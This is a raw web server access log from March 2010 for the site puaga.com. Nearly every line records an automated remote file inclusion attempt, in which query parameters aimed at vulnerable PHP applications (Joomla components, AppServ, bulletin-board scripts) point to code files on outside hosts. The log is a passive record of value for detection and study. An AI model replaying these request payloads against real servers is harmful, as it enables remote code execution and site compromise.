62.140.23.24 - - [01/Mar/2010:08:44:20 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:44:20 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:44:28 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:44:29 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:44:29 -0800] "GET /logs/access_100121.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:44:29 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:44:29 -0800] "GET /logs/access_100204.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:44:30 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:44:33 -0800] "GET ////bbs///////write_update_mail.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:44:33 -0800] "GET /logs/////bbs///////write_update_mail.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:44:33 -0800] "GET /logs/access_100221.log%20%20/////bbs///////write_update_mail.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:44:51 -0800] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 4948 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:44:51 -0800] "GET /logs/access_100204.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
85.233.162.101 - - [01/Mar/2010:08:44:51 -0800] "GET //?_SERVER[DOCUMENT_ROOT]=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:44:55 -0800] "GET /ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:44:55 -0800] "GET /logs//ams/amboard/write_filter.php?_SERVER[DOCUMENT_ROOT]=http://sawan.or.kr/SESSION/test.pl?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:44:58 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:44:58 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:44:58 -0800] "GET /logs/access_100121.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:45:06 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:45:06 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:45:06 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:45:06 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:45:06 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:45:06 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:45:10 -0800] "GET /logs/access_100130.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:45:10 -0800] "GET /errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:45:10 -0800] "GET /logs//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.0" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:08:45:16 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:08:45:16 -0800] "GET /logs/access_100128.log//bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:08:45:16 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.92.143.92 - - [01/Mar/2010:08:45:20 -0800] "GET /logs/access.log///?_SERVER[DOCUMENT_ROOT]=http://zerozon.co.kr/data/eeng/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:45:27 -0800] "GET /logs/access_100221.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
220.80.108.81 - - [01/Mar/2010:08:45:35 -0800] "GET /logs/access_100214.log//bbs//write_update.php?board_skin_path=http://www.gogos.kr/bbs/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:46:50 -0800] "GET /logs/access_100131.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:46:50 -0800] "GET /about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:46:50 -0800] "GET /logs//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:46:52 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:46:52 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:46:52 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:46:55 -0800] "GET /logs/access_100131.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:46:55 -0800] "GET /about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:46:55 -0800] "GET /logs//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:08 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:08 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:08 -0800] "GET /logs/access_100125.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:08 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:08 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:08 -0800] "GET /logs/access_100125.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:09 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:09 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:09 -0800] "GET /logs/access_100125.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:47:11 -0800] "GET /logs/access_100207.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:47:19 -0800] "GET /logs/access_100207.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.195.115.26 - - [01/Mar/2010:08:47:25 -0800] "GET /favicon.ico HTTP/1.0" 200 1406 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:27 -0800] "GET /logs/access_100202.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:47:29 -0800] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:47:29 -0800] "GET /logs/access_100120.log//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:47:29 -0800] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:38 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:38 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:47:38 -0800] "GET /logs/access_100125.log%20%20//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
217.73.168.38 - - [01/Mar/2010:08:47:44 -0800] "GET /logs/access_100121.log//errors.php?error=http://ladroz.interfree.it/echos.txt?? HTTP/1.1" 404 5258 "-" "libwww-perl/5.805" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:48:05 -0800] "GET /logs/access_100202.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:48:06 -0800] "GET /logs/access_100202.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:48:26 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:48:27 -0800] "GET /logs/access_100219.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:48:58 -0800] "GET /logs/access_100125.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:49:00 -0800] "GET /login.php?dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:49:00 -0800] "GET /logs/access_100206.log%20%20//login.php?dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:49:00 -0800] "GET /logs//login.php?dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [01/Mar/2010:08:49:23 -0800] "GET /logs/access_100204.log%20%20//login.php?dir=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:08:49:37 -0800] "GET /logs/access_100207.log%20%20//about.php?inc_dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:49:56 -0800] "GET /logs/access_100214.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:50:04 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:08:50:21 -0800] "GET /logs/access_100124.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:50:37 -0800] "GET /logs/access_100127.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:50:50 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:51:27 -0800] "GET /logs/access_100125.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:51:27 -0800] "GET /board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:51:27 -0800] "GET /logs//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:51:44 -0800] "GET /logs/access_100202.log//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
195.95.229.230 - - [01/Mar/2010:08:51:45 -0800] "GET /logs/access_100202.log%20%20//board//include/mail.inc.php?skin_board_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:52:00 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:52:01 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:52:03 -0800] "GET /logs/access_100219.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:52:19 -0800] "GET /logs/access_100214.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:52:22 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:52:37 -0800] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:52:38 -0800] "GET /index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
212.241.177.123 - - [01/Mar/2010:08:52:51 -0800] "GET /logs/access_100127.log//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.hubns.co.kr//data/list/heheh.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:53:00 -0800] "GET /logs/access_100210.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:07 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:07 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:17 -0800] "GET /logs/access_100121.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:53:17 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:53:17 -0800] "GET /logs/access_100211.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
41.204.218.244 - - [01/Mar/2010:08:53:17 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:19 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:53:25 -0800] "GET /components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:53:25 -0800] "GET /logs//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:53:25 -0800] "GET /logs/access_100211.log//components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
62.140.23.24 - - [01/Mar/2010:08:53:48 -0800] "GET /logs/access_100224.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:56 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:57 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:57 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:53:59 -0800] "GET /logs/access_100121.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:54:03 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:54:03 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:54:35 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:54:35 -0800] "GET /logs//login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [01/Mar/2010:08:54:35 -0800] "GET /login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:54:46 -0800] "GET /logs/access_100123.log%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:54:50 -0800] "GET /logs/access_100126.log%20%20//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:54:52 -0800] "GET /logs//appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:54:53 -0800] "GET /appserv/main.php?appserv_root=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:08:54:56 -0800] "GET /logs/access_100219.log%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
110.45.147.76 - - [01/Mar/2010:08:54:58 -0800] "GET /logs/access_100120.log%20%20//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://www.lionspride.co.za/content_old/themes/a.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
61.111.3.35 - - [01/Mar/2010:08:55:36 -0800] "GET /logs/access_100201.log%20%20//login.php?dir=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
